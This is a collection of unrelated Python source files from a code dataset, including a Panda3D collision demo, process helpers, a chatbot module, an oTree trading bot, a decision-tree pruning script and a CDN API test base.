own root node (avatarNP)\navatar2.setPos(art.getX(),art.getY(), art.getZ()+3.325)\navatar2.setColor(1, 1, 0, 1)\navatar2.setCollideMask(BitMask32.allOff())\n\nart2 = loader.loadModel('cilindroR')\nart2.reparentTo(avatar2)\n# since our avatar origin is centered in a model sized 2,2,2, we need to shift it 1 unit above the ground and this time we make this happen shifting it off its own root node (avatarNP)\nart2.setPos(avatar2.getX(),avatar2.getY(), avatar2.getZ())\nart2.setColor(1, 0, 0,1)\nart2.setCollideMask(BitMask32.allOff())\n\navatar3 = loader.loadModel('cilindroB')\navatar3.reparentTo(art2)\n# since our avatar origin is centered in a model sized 2,2,2, we need to shift it 1 unit above the ground and this time we make this happen shifting it off its own root node (avatarNP)\navatar3.setPos(art2.getX(),art2.getY(), art2.getZ())\navatar3.setColor(1, 0.5, 0, 1)\navatar3.setCollideMask(BitMask32.allOff())\n\nart3 = loader.loadModel('cilindroR')\nart3.reparentTo(avatar3)\n# since our avatar origin is centered in a model sized 2,2,2, we need to shift it 1 unit above the ground and this time we make this happen shifting it off its own root node (avatarNP)\nart3.setPos(avatar3.getX(),avatar3.getY(), avatar3.getZ())\nart3.setColor(1, 0, 0,1)\nart3.setCollideMask(BitMask32.allOff())\n\n\n\n\navatarNP.setPos(0,0,15)\n# we reintroduced in this snippet the renowned smiley collision sphere - we need it as low-poly collision geometry for the wall collision handler to know when the smiley hit a wall.\navatarCollider = avatar.attachNewNode(CollisionNode('smileycnode'))\navatarCollider.node().addSolid(CollisionSphere(0, 0, 0, 1))\n# of course we mark it with the wall mask\navatarCollider.node().setFromCollideMask(WALL_MASK)\navatarCollider.node().setIntoCollideMask(BitMask32.allOff())\n\n# we reintroduced in this snippet the renowned smiley collision sphere - we need it as low-poly collision geometry for the wall collision handler to know when the smiley hit a wall.\nartCollider = art.attachNewNode(CollisionNode('smileycnode'))\nartCollider.node().addSolid(CollisionSphere(avatar.getX(),avatar.getY(), avatar.getZ(), 1))\n# of course we mark it with the wall mask\nartCollider.node().setFromCollideMask(BitMask32.allOff())\n\n\n# we reintroduced in this snippet the renowned smiley collision sphere - we need it as low-poly collision geometry for the wall collision handler to know when the smiley hit a wall.\navatar2Collider = avatar2.attachNewNode(CollisionNode('smileycnode'))\navatar2Collider.node().addSolid(CollisionSphere(art.getX(),art.getY(), art.getZ()+3.325, 1))\n# of course we mark it with the wall mask\navatar2Collider.node().setFromCollideMask(BitMask32.allOff())\n\n\n# we reintroduced in this snippet the renowned smiley collision sphere - we need it as low-poly collision geometry for the wall collision handler to know when the smiley hit a wall.\nart2Collider = art2.attachNewNode(CollisionNode('smileycnode'))\nart2Collider.node().addSolid(CollisionSphere(avatar2.getX(),avatar2.getY(), avatar2.getZ(), 1))\n# of course we mark it with the wall mask\nart2Collider.node().setFromCollideMask(BitMask32.allOff())\n\n\n\n\n#** Here we stick and set the ray collider to the avatar - note that we set it well above the avatar position because like this we are sure to always find a floor surface higher than the avatar top - try to change the third value i.e. to 0 and see what happen steering the avatar to get what I mean\nraygeometry = CollisionRay(0, 0, 2, 0, 0, -1)\navatarRay = avatarNP.attachNewNode(CollisionNode('avatarRay'))\navatarRay.node().addSolid(raygeometry)\n# this is how we tell the collision system that this ray would collide just with the floor acting as a FROM collider.\navatarRay.node().setFromCollideMask(FLOOR_MASK)\n# we then exclude the ray from acting as an INTO collider\navatarRay.node().setIntoCollideMask(BitMask32.allOff())\n\n\n\n\n#** This is the terrain map - the egg model loaded contains also the collider geometry for the terrain and for the walls as childs\nterrain = loader.loadModel(\"scene1\")\nterrain.reparentTo(render)\nterrain.setCollideMask(BitMask32.allOff())\nterrain.setScale(16)\n# here how we tell the collision system that the terrain collider geometry is allowed to collide with the avatar ray as INTO collider...\nfloorcollider=terrain.find(\"**/floor_collide\")\nfloorcollider.node().setIntoCollideMask(FLOOR_MASK)\n#...and the same goes for the walls\nwallcollider=terrain.find(\"**/wall_collide\")\nwallcollider.node().setIntoCollideMask(WALL_MASK)\n\n#** as said in step1 we tells to our collision handlers who take part to the respective tasks: for the floor the avatar ray and the avatar nodepath...\nfloorHandler.addCollider(avatarRay, avatarNP)\n# ...and for the walls the avatar sphere collider together with - again - the avatar nodepath\nwallHandler.addCollider(avatarCollider, avatarNP)\n\nwallHandler.addCollider(artCollider, avatarNP)\nwallHandler.addCollider(avatar2Collider, avatarNP)\nwallHandler.addCollider(art2Collider, avatarNP)\n\n#** Now we're ready to start the collisions using the avatar ray to use to fire collisions for the floorHandler...\nbase.cTrav.addCollider(avatarRay, floorHandler)\n# ... and the sphere for the wallHandler\nbase.cTrav.addCollider(avatarCollider, wallHandler)\n\nbase.cTrav.addCollider(artCollider, wallHandler)\nbase.cTrav.addCollider(avatar2Collider, wallHandler)\nbase.cTrav.addCollider(art2Collider, wallHandler)\n\n# A task to run every frame, some keyboard setup and our speed\ntaskMgr.add(updateTask, \"update\")\n#** Activating avatar steering function - now we're ready to go\nsteering=snipstuff.avatar_steer(avatarNP, fwspeed=12.)\nsteering.start()\nsplash.destroy()\nbase.run()\n","sub_path":"mao5.py","file_name":"mao5.py","file_ext":"py","file_size_in_byte":11935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"105361158","text":"import os\nimport signal\nimport subprocess\nimport utils.logger as logger\nimport json\n\n_cur_dir = os.path.dirname(os.path.realpath(__file__))\n\n\ndef load_json(json_path):\n with open(json_path, 'r') as jp:\n obj = json.load(jp)\n return obj\n\n\ndef save_json(json_path, obj):\n with open(json_path, 'w') as jp:\n json.dump(obj, jp)\n return True\n\n\ndef check_running_proc(proc_name):\n \"\"\"\n Check if a process is running or not\n :param proc_name:\n :return:\n \"\"\"\n try:\n if len(os.popen(\"ps -aef | grep -i '%s' \"\n \"| grep -v 'grep' | awk '{ print $3 }'\" % proc_name).read().strip().splitlines()) > 0:\n return True\n except Exception as e:\n logger.error('Failed to get status of the process({}) - {}'.format(proc_name, e))\n return False\n\n\ndef kill_process_by_name(proc_name):\n \"\"\"\n Kill process by its name\n :param proc_name:\n :return:\n \"\"\"\n p = subprocess.Popen(['ps', '-A'], stdout=subprocess.PIPE)\n out, err = p.communicate()\n for line in out.decode().splitlines():\n if proc_name in line:\n pid = int(line.split(None, 1)[0])\n print('Found PID({}) of `{}`, killing...'.format(pid, proc_name))\n os.kill(pid, signal.SIGKILL)\n","sub_path":"utils/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"47009255","text":"import os\n\n\nDEBUG = True\n\nDATABASES = {\n \"default\": {\n \"ENGINE\": \"django.db.backends.sqlite3\",\n }\n}\n\nINSTALLED_APPS = (\n \"test_without_migrations\",\n \"form_renderers\",\n \"form_renderers.tests\",\n \"django.contrib.contenttypes\",\n \"django.contrib.sites\",\n)\n\nCACHES = {\n \"default\": {\n \"BACKEND\": \"django.core.cache.backends.locmem.LocMemCache\",\n }\n}\n\nSITE_ID = 1\n\nSECRET_KEY = \"SECRET_KEY\"\n\nFORM_RENDERERS = {\"enable-bem-classes\": True}\n","sub_path":"form_renderers/tests/settings/111.py","file_name":"111.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"318551582","text":"# SCAR - Serverless Container-aware ARchitectures\n# Copyright (C) GRyCAP - I3M - UPV\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport requests\n\ndef invoke_function(url, parameters=None, data=None, headers=None):\n if data is None:\n response = requests.get(url, headers=headers, params=parameters)\n else:\n response = requests.post(url, headers=headers, data=data, params=parameters)\n return response","sub_path":"src/http/invoke.py","file_name":"invoke.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"618318459","text":"import importlib\nfrom Entity import Entity\nfrom enum import Enum\nfrom collections import OrderedDict\n\nclass State(Enum):\n init = 1\n waitForAnswer = 2\n waitForConfirm = 3\n confirmed = 4\n\nclass BusinessCase:\n def __init__(self, config):\n self.name = config[\"name\"]\n self.intent = config[\"intent\"]\n entities = [Entity(e) for e in config[\"entities\"]] if \"entities\" in config else []\n self.entities = OrderedDict()\n for e in entities:\n self.entities[e.name] = e\n if \"businessLogic\" in config:\n module = importlib.import_module(\"BusinessLogic.\" + config[\"businessLogic\"])\n self.businessLogic = getattr(module, config[\"businessLogic\"])()\n else:\n self.businessLogic=None\n self.confirmationPhrase = config[\"confirmationPhrase\"] if \"confirmationPhrase\" in config else None\n self.openingQuestion = config[\"openingQuestion\"]\n self.state = State.init\n self.currentEntity = None\n if \"extractor\" in config:\n module = importlib.import_module(\"EntityExtractors.\" + config[\"extractor\"])\n self.extractor = getattr(module, config[\"extractor\"])()\n else:\n self.extractor = None\n\n def processMessage(self, message, clientId, attachments):\n if self.state is State.init:\n if self.extractor:\n self.state = State.waitForAnswer\n else:\n self.state = State.confirmed\n return self.openingQuestion\n elif self.state is State.waitForAnswer:\n self.extractEntities(message, attachments)\n self.currentEntity = self.getNextEmptyEntity()\n\n if not self.currentEntity:\n if not self.confirmationPhrase:\n self.state=State.confirmed\n else:\n self.state = State.waitForConfirm\n return self.businessLogic.processEntities(self.entities.values())\n else:\n self.state = State.waitForAnswer\n return self.currentEntity.question\n\n elif self.state is State.waitForConfirm:\n self.state = State.confirmed\n return self.confirmationPhrase\n\n\n def extractEntities(self, message, attachments):\n if attachments:\n for attachment in attachments:\n emptyEntities = self.getEmptyEntities()\n if self.currentEntity and self.currentEntity.extractor:\n matchesForEntityExtractor = self.currentEntity.extractor.extractFromImage(attachment, emptyEntities, self.currentEntity)\n for match in matchesForEntityExtractor:\n self.entities[match.name].value = match.value\n self.entities[match.name].confidence = match.confidence\n emptyEntities = self.getEmptyEntities()\n\n matches = self.extractor.extractFromImage(attachment, emptyEntities, self.currentEntity)\n for match in matches:\n self.entities[match.name].value = match.value\n self.entities[match.name].confidence = match.confidence\n\n if message:\n emptyEntities = self.getEmptyEntities()\n if self.currentEntity and self.currentEntity.extractor:\n matchesForEntityExtractor = self.currentEntity.extractor.extractFromText(message, emptyEntities,\n self.currentEntity)\n for match in matchesForEntityExtractor:\n self.entities[match.name].value = match.value\n self.entities[match.name].confidence = match.confidence\n emptyEntities = self.getEmptyEntities()\n \n matches = self.extractor.extractFromText(message, emptyEntities, self.currentEntity)\n\n for match in matches:\n self.entities[match.name].value = match.value\n self.entities[match.name].confidence = match.confidence\n\n\n def getNextEmptyEntity(self):\n if not self.entities:\n return None\n for entity in self.entities.values():\n if not entity.value:\n return entity\n return None\n\n def getEmptyEntities(self):\n if not self.entities:\n return None\n entities = []\n for entity in self.entities.values():\n if not entity.value:\n entities.append(entity.name)\n return entities","sub_path":"servers/ChatbotServer/Chatbot/BusinessCase.py","file_name":"BusinessCase.py","file_ext":"py","file_size_in_byte":4548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"206085813","text":"from otree.api import Currency as c, currency_range\nimport pandas as pd\nimport numpy as np\nimport datetime\nimport random\nimport pickle\n\n\nclass Participant():\n def __init__(self):\n self.vars = {'group': None}\n self.payoff = c(0)\n\n\nclass Constants():\n trade_good = 'Bien de Consumo'\n\n\nclass Round():\n def __init__(self):\n self.role_pre = None\n self.other_role_pre = None\n self.token_color = None\n self.other_token_color = None\n self.group_color = None\n self.other_group_color=None\n self.trade_attempted = None\n self.trade_succeeded = None\n self.payoff = None\n self.cumulative_payoff = None\n\n def over(self):\n if all(vars(self).values()):\n return True\n return False\n\n def __str__(self):\n return f'role pre: {self.role_pre}\\n' + \\\n f'other role pre: {self.other_role_pre}\\n' + \\\n f'token color: {self.token_color}\\n' + \\\n f'other token color: {self.other_token_color}\\n' + \\\n f'group color: {self.group_color}\\n' + \\\n f'other group_color: {self.other_group_color}\\n' + \\\n f'trade attempted: {self.trade_attempted}\\n' + \\\n f'trade succeeded: {self.trade_succeeded}\\n' + \\\n f'payoff: {self.payoff}\\n' + \\\n f'cumulative payoff: {self.cumulative_payoff}\\n'\n\n\nclass AutomatedTrader():\n def __init__(self, session, id_in_group, num_rounds, players_per_group):\n self.participant = Participant()\n self.__round_data = [Round() for i in range(num_rounds)]\n self.session = session\n self.id_in_group = id_in_group\n self.round_number = 0\n self.players_per_group = players_per_group\n\n def dump_round_data(self):\n id_in_session = (self.id_in_group - 1) + (self.players_per_group * self.participant.vars['group'])\n fname = f'{self.session.code}_{id_in_session}.pkl' \n with open(fname, 'wb') as f:\n pickle.dump(self.__round_data, f)\n \n def load_round_data(self):\n id_in_session = (self.id_in_group - 1) + (self.players_per_group * self.participant.vars['group'])\n fname = f'{self.session.code}_{id_in_session}.pkl' \n with open(fname, 'rb') as f:\n self.__round_data = pickle.load(f)\n\n def export_data(self):\n cols = ['participant.id_in_session',\n 'participant.payoff',\n 'participant.is_automated',\n 'player.id_in_group',\n 'player.role_pre',\n 'player.other_role_pre',\n 'player.token_color',\n 'player.other_token_color',\n 'player.group_color',\n 'player.other_group_color',\n 'player.trade_attempted',\n 'player.trade_succeeded',\n 'player.payoff',\n 'group.id_in_subsession',\n 'subsession.round_number',\n 'session.code',\n ]\n\n df = {}\n self.load_round_data()\n n = len(self.__round_data)\n id_in_session = (self.id_in_group - 1) + (self.players_per_group * self.participant.vars['group'])\n df[cols[0]] = np.full(n, id_in_session)\n df[cols[1]] = np.array([r.cumulative_payoff if r.cumulative_payoff != None\\\n else 0* self.session.config['soles_per_ecu'] for r in self.__round_data])\n df[cols[2]] = np.full(n, 1)\n df[cols[3]] = np.full(n, self.id_in_group + 1)\n df[cols[4]] = np.array([r.role_pre for r in self.__round_data])\n df[cols[5]] = np.array([r.other_role_pre for r in self.__round_data])\n df[cols[6]] = np.array([r.token_color for r in self.__round_data])\n df[cols[7]] = np.array([r.other_token_color for r in self.__round_data])\n df[cols[8]] = np.array([r.group_color for r in self.__round_data])\n df[cols[9]] = np.array([r.other_group_color for r in self.__round_data])\n df[cols[10]] = np.array([r.trade_attempted for r in self.__round_data])\n df[cols[11]] = np.array([r.trade_succeeded for r in self.__round_data])\n df[cols[12]] = np.array([r.payoff for r in self.__round_data])\n df[cols[13]] = np.full(n, self.participant.vars['group'] + 1)\n df[cols[14]] = np.array([i for i in range(1, n + 1)])\n df[cols[15]] = np.full(n, self.session.code)\n df = pd.DataFrame(df)\n date = datetime.datetime.now().strftime('%Y-%m-%d')\n df.to_csv(f'dedollarization_{date}_session_{self.session.code}_automated_trader_{id_in_session}.csv')\n\n def trade(self, subsession):\n self.load_round_data()\n self.round_number = subsession.round_number - 1\n # self.session.vars['pairs'] is a list of rounds.\n # each round is a dict of (group,id):(group,id) pairs.\n group_id = self.participant.vars['group']\n player_groups = subsession.get_groups()\n bot_groups = self.session.vars['automated_traders']\n # gets a another pair\n # the other pair is the pair that is paired with the current player\n other_group, other_id = self.session.vars['pairs'][self.round_number][\n (group_id, self.id_in_group - 1)]\n if other_group < len(player_groups):\n other_player = player_groups[other_group].get_player_by_id(other_id + 1)\n else:\n other_player = bot_groups[(other_group, other_id)]\n\n # whatever color token they were assigned in models.py\n self.token_color = self.participant.vars['token']\n self.other_token_color = other_player.participant.vars['token']\n\n # defining roles as in models.py\n # ensuring opposites, such that half are producers and half are consumers\n self.role_pre = 'Consumer' if self.participant.vars['token'] != Constants.trade_good else 'Producer'\n self.other_role_pre = 'Consumer' if self.other_token_color != Constants.trade_good else 'Producer'\n\n # defining group color as in models.py\n self.group_color = self.participant.vars['group_color']\n self.other_group_color = other_player.participant.vars['group_color']\n\n #assert (self.token_color != None)\n #assert (self.other_token_color != None)\n #assert (self.role_pre != None)\n #assert (self.other_role_pre != None)\n #assert (self.group_color != None)\n #assert (self.other_group_color != None)\n\n # logic for whether you trade or not. \n if self.role_pre == self.other_role_pre:\n self.trade_attempted = False\n else:\n\n ### TREATMENT: BOTS ONLY ACCEPT THEIR OWN COLOR\n\n # if \"bots only trading the same color (blue)\" treatment is on\n if self.session.config['bots_trade_same_color']:\n\n # BOT is \"self\": if the other token is blue, then trade\n if self.other_token_color == self.group_color \\\n or self.role_pre == 'Consumer':\n self.trade_attempted = True\n\n # if not, then don't\n else:\n self.trade_attempted = False\n\n # if \"bots only trading the same color (blue)\" treatment is off\n # then just always trade\n else:\n self.trade_attempted = True\n self.dump_round_data()\n print(f'Round {self.round_number}, bot {self.id_in_group}, END OF TRADE\\n{self.__round_data[self.round_number]}')\n\n def compute_results(self, subsession, reward):\n self.load_round_data()\n self.round_number = subsession.round_number - 1\n if self.trade_attempted == None:\n self.trade(subsession)\n group_id = self.participant.vars['group'] \n player_groups = subsession.get_groups()\n bot_groups = self.session.vars['automated_traders']\n \n # identify trading partner\n # similar to above in Trade()\n other_group, other_id = self.session.vars['pairs'][self.round_number][\n (group_id, self.id_in_group - 1)]\n \n # get other player object\n if other_group < len(player_groups):\n other_player = player_groups[other_group].get_player_by_id(other_id + 1)\n else:\n other_player = bot_groups[(other_group, other_id)]\n other_player.load_round_data()\n other_player.round_number = self.round_number\n # define initial round payoffs\n round_payoff = c(0)\n\n # logic for switching objects on trade\n # if both players attempted a trade, it must be true\n # that one is a producer and one is a consumer.\n # Only 1 player performs the switch\n if self.trade_attempted and other_player.trade_attempted:\n # only 1 player actually switches the goods\n if self.trade_succeeded is None:\n # switch tokens\n self.participant.vars['token'] = self.other_token_color\n other_player.participant.vars['token'] = self.token_color\n # set players' trade_succeeded field\n self.trade_succeeded = True\n other_player.trade_succeeded = True\n if other_group > len(player_groups):\n other_player.store_round_data()\n\n ### TREATMENT: TAX ON FOREIGN (OPPOSITE) CURRENCY\n\n # if the player is the consumer, apply consumer tax to them\n # and apply producer tax to other player\n\n # FOREIGN TRANSACTION:\n # both parties the same group color\n if self.role_pre == 'Consumer':\n tax_consumer = c(0)\n if self.token_color != self.other_group_color and \\\n self.group_color == self.other_group_color:\n tax_consumer += self.session.config['foreign_tax'] \\\n * self.session.config['percent_foreign_tax_consumer']\n round_payoff += reward - tax_consumer\n\n # else if the player is the consumer, opposite\n else:\n tax_producer = c(0)\n if self.group_color != self.other_token_color and \\\n self.group_color == self.other_group_color:\n tax_producer += self.session.config['foreign_tax'] \\\n * self.session.config['percent_foreign_tax_producer']\n round_payoff -= tax_producer\n \n else:\n self.trade_succeeded = False\n assert(self.trade_succeeded is not None)\n # penalties for self\n # if your token matches your group color\n\n # TOKEN STORE COST:\n # if token held for a round = if trade did not succeed\n # homo: token is your color\n # hetero: token is different color\n if not self.trade_succeeded:\n if self.participant.vars['token'] == self.participant.vars['group_color']:\n round_payoff -= c(self.session.config['token_store_cost_homogeneous'])\n\n # if your token matches the opposite group color\n elif self.participant.vars['token'] != Constants.trade_good:\n round_payoff -= c(self.session.config['token_store_cost_heterogeneous'])\n\n # set payoffs\n self.set_payoffs(round_payoff)\n self.dump_round_data()\n print(f'Round {self.round_number}, bot {self.id_in_group}, END OF RESULTS\\n{self.__round_data[self.round_number]}')\n \n def set_payoffs(self, round_payoff):\n self.payoff = round_payoff\n\n @property\n def payoff(self):\n r = self.__round_data[self.round_number]\n return r.payoff\n\n @payoff.setter\n def payoff(self, v):\n r = self.__round_data[self.round_number]\n r.payoff = v\n self.participant.payoff += v\n r.cumulative_payoff = self.participant.payoff\n \n \n def in_round(self, n):\n return self.__round_data[n - 1]\n\n @property\n def role_pre(self):\n r = self.__round_data[self.round_number]\n return r.role_pre\n\n @role_pre.setter\n def role_pre(self, v):\n r = self.__round_data[self.round_number]\n r.role_pre = v\n\n @property\n def other_role_pre(self):\n r = self.__round_data[self.round_number]\n return r.other_role_pre\n\n @other_role_pre.setter\n def other_role_pre(self, v):\n r = self.__round_data[self.round_number]\n r.other_role_pre = v\n \n @property\n def token_color(self):\n r = self.__round_data[self.round_number]\n return r.token_color\n\n @token_color.setter\n def token_color(self, v):\n r = self.__round_data[self.round_number]\n r.token_color = v\n\n @property\n def other_token_color(self):\n r = self.__round_data[self.round_number]\n return r.other_token_color\n\n @other_token_color.setter\n def other_token_color(self, v):\n r = self.__round_data[self.round_number]\n r.other_token_color = v\n\n @property\n def group_color(self):\n r = self.__round_data[self.round_number]\n return r.group_color\n\n @group_color.setter\n def group_color(self, v):\n r = self.__round_data[self.round_number]\n r.group_color = v\n\n @property\n def other_group_color(self):\n r = self.__round_data[self.round_number]\n return r.other_group_color\n\n @other_group_color.setter\n def other_group_color(self, v):\n r = self.__round_data[self.round_number]\n r.other_group_color = v\n\n @property\n def trade_attempted(self):\n r = self.__round_data[self.round_number]\n return r.trade_attempted\n\n @trade_attempted.setter\n def trade_attempted(self, v):\n r = self.__round_data[self.round_number]\n r.trade_attempted = v\n\n @property\n def trade_succeeded(self):\n r = self.__round_data[self.round_number]\n return r.trade_succeeded\n\n @trade_succeeded.setter\n def trade_succeeded(self, v):\n r = self.__round_data[self.round_number]\n r.trade_succeeded = v\n\n","sub_path":"automated_trader.py","file_name":"automated_trader.py","file_ext":"py","file_size_in_byte":14008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"620307295","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 5 12:24:13 2017\n\n@author: marti\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport pickle\nfrom Node import Node\nimport copy\nimport pydotplus as pydot\nimport os\nos.environ[\"PATH\"] += os.pathsep + 'C:/Program Files (x86)/Graphviz2.38/bin/'\n\ndef correct_labeled(x, node, current_node, passed_node = False) : # gives -1 if example doesnt pass current_node,\n \n if(node == current_node): # and 1/0 for the respective class the example fits to\n passed_node = True # If it passed the node at some point, the example will be added later\n if(node.leaf):\n if(passed_node == False):\n return -1\n if(x.class_label == node.label):\n return 1\n else:\n return 0\n else:\n \n \n value = getattr(x, node.split_attr)\n if ( value <= node.split_value):\n return correct_labeled(x, node.left, current_node, passed_node) \n else:\n return correct_labeled(x, node.right, current_node, passed_node)\n \n \ndef compute_acc(correct, total_len): # compute accuracy from respective node\n if total_len == 0: accuracy = 1\n else: accuracy = correct / total_len\n return accuracy\n \ndef compute_prun_acc(labels, total_len): # computes acuracy when node is a leafnode and fitting class\n if total_len == 0:\n prun_accuracy = 1\n else:\n prun_accuracy = labels / total_len \n \n if prun_accuracy < 0.5: # prun accuracy counts the labels of 1 or 0\n prun_accuracy = 1 - prun_accuracy\n prun_class = 0 # class after pruning\n else: prun_class = 1\n return prun_accuracy, prun_class\n \ndef compute_accuracys(current_node):\n iter_csv = CSV.itertuples() #brings fitting format of one example\n correct = 0.\n labels = 0.\n prun_class = 1 \n \n total_len = float(len(CSV)) # total length of all examples\n\n for x in iter_csv:\n i= correct_labeled(x, TREE, current_node) # i says if the label was correct\n if i == -1: # -1 means x didnt pass node\n total_len -= 1 # than the total size should shrink by one because this sample is not viewed\n else:\n labels += x.class_label\n correct += i\n \n acc = compute_acc(correct, total_len)\n prun_acc, prun_class = compute_prun_acc(labels, total_len)\n\n return acc, prun_acc, prun_class \n\ndef make_node_to_leaf(node, prun_class):\n node.left = None\n node.right = None\n node.leaf = True\n node.label = prun_class\n \ndef graphstuff(node, gparent, nparent, graph): \n global nodenr\n \n if (node.leaf):\n g_node = pydot.Node(nodenr, shape = \"oval\", label= node.label , style=\"solid\", fillcolor=\"red\")\n else:\n g_node = pydot.Node(nodenr, shape = \"box\", label= node.label , style=\"solid\", fillcolor=\"red\")\n graph.add_node(g_node)\n if gparent != None:\n if (nparent.left == node):\n graph.add_edge(pydot.Edge(gparent, g_node, label = \"True\"))\n else:\n graph.add_edge(pydot.Edge(gparent, g_node, label = \"False\"))\n nodenr += 1 \n return g_node\n\ndef pruning(node):\n accuracy, prun_accuracy , prun_class = compute_accuracys(node)\n #print(accuracy, prun_accuracy)\n # ToDo make new node and substitude old one\n if prun_accuracy >= accuracy:\n make_node_to_leaf(node, prun_class)\n print(\"pruned\")\n \ndef post_order_traversal(node):\n if(node.leaf): return\n post_order_traversal(node.left)\n post_order_traversal(node.right)\n pruning(node)\n \ndef graphstuff(node, gparent, nparent): \n global nodenr\n \n if (node.leaf):\n g_node = pydot.Node(nodenr, shape = \"oval\", label= node.label , style=\"solid\", fillcolor=\"red\")\n else:\n g_node = pydot.Node(nodenr, shape = \"box\", label= node.label , style=\"solid\", fillcolor=\"red\")\n GRAPH.add_node(g_node)\n if gparent != None:\n if (nparent.left == node):\n GRAPH.add_edge(pydot.Edge(gparent, g_node, label = \"True\"))\n else:\n GRAPH.add_edge(pydot.Edge(gparent, g_node, label = \"False\"))\n\n nodenr += 1 \n return g_node\n \ndef pre_order_traversal(node, g_parent, n_parent):\n if node == None: return\n g_node = graphstuff(node, g_parent, n_parent)\n pre_order_traversal(node.left, g_node, node)\n pre_order_traversal(node.right, g_node, node)\n\n\ndef prune_heuristicly(graphNameToPrune, newGraphName, csv):\n global CSV\n global TREE\n global nodenr\n global GRAPH \n\n nodenr = 0\n GRAPH = pydot.Dot(graph_type='graph')\n\n \n CSV = csv\n TREE = pickle.load( open(graphNameToPrune + \".p\", \"rb\") )\n post_order_traversal(TREE)\n pre_order_traversal(TREE, None, None)\n\n\n pickle.dump(TREE, open(newGraphName + \".p\", \"wb\"))\n GRAPH.write_png(newGraphName + '.png')\n GRAPH.write_dot(newGraphName + '.dot')\n\nCSV = 0\nTREE = 0\nnodenr = 0\nGRAPH = 0\n ","sub_path":"ML_Ass_1_Python27/Pruning_heuristic.py","file_name":"Pruning_heuristic.py","file_ext":"py","file_size_in_byte":5002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"528922363","text":"# Copyright (c) 2014 Rackspace, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport random\nimport string\nimport uuid\n\nfrom cafe.drivers.unittest import fixtures\nimport jsonschema\n\nfrom tests.api.utils import client\nfrom tests.api.utils import config\n\n\nclass TestBase(fixtures.BaseTestFixture):\n\n \"\"\"Child class of fixtures.BaseTestFixture for testing CDN.\n\n Inherit from this and write your test methods. If the child class defines\n a prepare(self) method, this method will be called before executing each\n test method.\n \"\"\"\n\n @classmethod\n def setUpClass(cls):\n\n super(TestBase, cls).setUpClass()\n\n import requests.packages.urllib3\n requests.packages.urllib3.disable_warnings()\n\n cls.auth_config = config.AuthConfig()\n if cls.auth_config.auth_enabled:\n cls.auth_client = client.AuthClient()\n auth_token, cls.user_project_id = \\\n cls.auth_client.authenticate_user(\n cls.auth_config.base_url,\n cls.auth_config.user_name,\n cls.auth_config.api_key,\n cls.auth_config.password)\n else:\n auth_token = str(uuid.uuid4())\n cls.user_project_id = str(uuid.uuid4())\n\n cls.test_config = config.TestConfig()\n\n cls.config = config.PoppyConfig()\n if cls.test_config.project_id_in_url:\n cls.url = cls.config.base_url + '/v1.0/' + cls.user_project_id\n else:\n cls.url = cls.config.base_url + '/v1.0'\n\n cls.client = client.PoppyClient(cls.url, auth_token,\n cls.user_project_id,\n serialize_format='json',\n deserialize_format='json')\n\n if cls.auth_config.multi_user:\n alt_auth_token, alt_project_id = cls.auth_client.authenticate_user(\n cls.auth_config.base_url,\n cls.auth_config.alt_user_name,\n cls.auth_config.alt_api_key)\n if cls.test_config.project_id_in_url:\n alt_url = cls.config.base_url + '/v1.0/' + alt_project_id\n else:\n alt_url = cls.config.base_url + '/v1.0'\n\n cls.alt_user_client = client.PoppyClient(\n alt_url, alt_auth_token,\n alt_project_id,\n serialize_format='json',\n deserialize_format='json')\n\n service_limit_auth_token, service_limit_project_id = \\\n cls.auth_client.authenticate_user(\n cls.auth_config.base_url,\n cls.auth_config.service_limit_user_name,\n cls.auth_config.service_limit_api_key)\n if cls.test_config.project_id_in_url:\n service_limit_url = cls.config.base_url \\\n + '/v1.0/' + service_limit_project_id\n else:\n service_limit_url = cls.config.base_url + '/v1.0'\n\n cls.service_limit_user_client = client.PoppyClient(\n service_limit_url, service_limit_auth_token,\n service_limit_project_id,\n serialize_format='json',\n deserialize_format='json')\n if cls.test_config.run_operator_tests:\n operator_auth_token, operator_project_id = \\\n cls.auth_client.authenticate_user(\n cls.auth_config.base_url,\n cls.auth_config.operator_user_name,\n cls.auth_config.operator_api_key)\n if cls.test_config.project_id_in_url:\n cls.operator_url = cls.config.base_url + '/v1.0/' + \\\n operator_project_id\n else:\n cls.operator_url = cls.config.base_url + '/v1.0'\n\n cls.operator_client = client.PoppyClient(\n cls.operator_url, operator_auth_token, operator_project_id,\n serialize_format='json',\n deserialize_format='json')\n\n cls.dns_config = config.DNSConfig()\n cls.shared_ssl_num_shards = cls.dns_config.shared_ssl_num_shards\n cls.dns_client = client.DNSClient(cls.dns_config.dns_username,\n cls.dns_config.dns_api_key)\n\n cls.akamai_config = config.AkamaiConfig()\n\n def generate_random_string(self, prefix='API-Tests', length=12):\n \"\"\"Generates a random string of given prefix & length\"\"\"\n random_string = ''.join(random.choice(\n string.ascii_lowercase + 